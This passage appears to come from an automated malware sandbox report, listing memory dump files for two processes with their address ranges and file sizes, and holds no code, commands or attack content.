                                                                • memory/2328-70-0x00007FF87AE50000-0x00007FF87B2B6000-memory.dmp

                                                                  Filesize

                                                                  4.4MB

                                                                • memory/2328-71-0x00007FF889D20000-0x00007FF889DD8000-memory.dmp

                                                                  Filesize

                                                                  736KB

                                                                • memory/2328-167-0x00007FF88D5E0000-0x00007FF88D60E000-memory.dmp

                                                                  Filesize

                                                                  184KB

                                                                • memory/2328-64-0x00007FF88F300000-0x00007FF88F30D000-memory.dmp

                                                                  Filesize

                                                                  52KB

                                                                • memory/2328-62-0x00007FF88DC10000-0x00007FF88DC29000-memory.dmp

                                                                  Filesize

                                                                  100KB

                                                                • memory/2328-60-0x00007FF87A770000-0x00007FF87A8ED000-memory.dmp

                                                                  Filesize

                                                                  1.5MB

                                                                • memory/2328-58-0x00007FF88E830000-0x00007FF88E84F000-memory.dmp

                                                                  Filesize

                                                                  124KB

                                                                • memory/2328-56-0x00007FF88EA10000-0x00007FF88EA28000-memory.dmp

                                                                  Filesize

                                                                  96KB

                                                                • memory/2328-54-0x00007FF88DC80000-0x00007FF88DCAC000-memory.dmp

                                                                  Filesize

                                                                  176KB

                                                                • memory/2760-228-0x0000023669D30000-0x0000023669D38000-memory.dmp

                                                                  Filesize

                                                                  32KB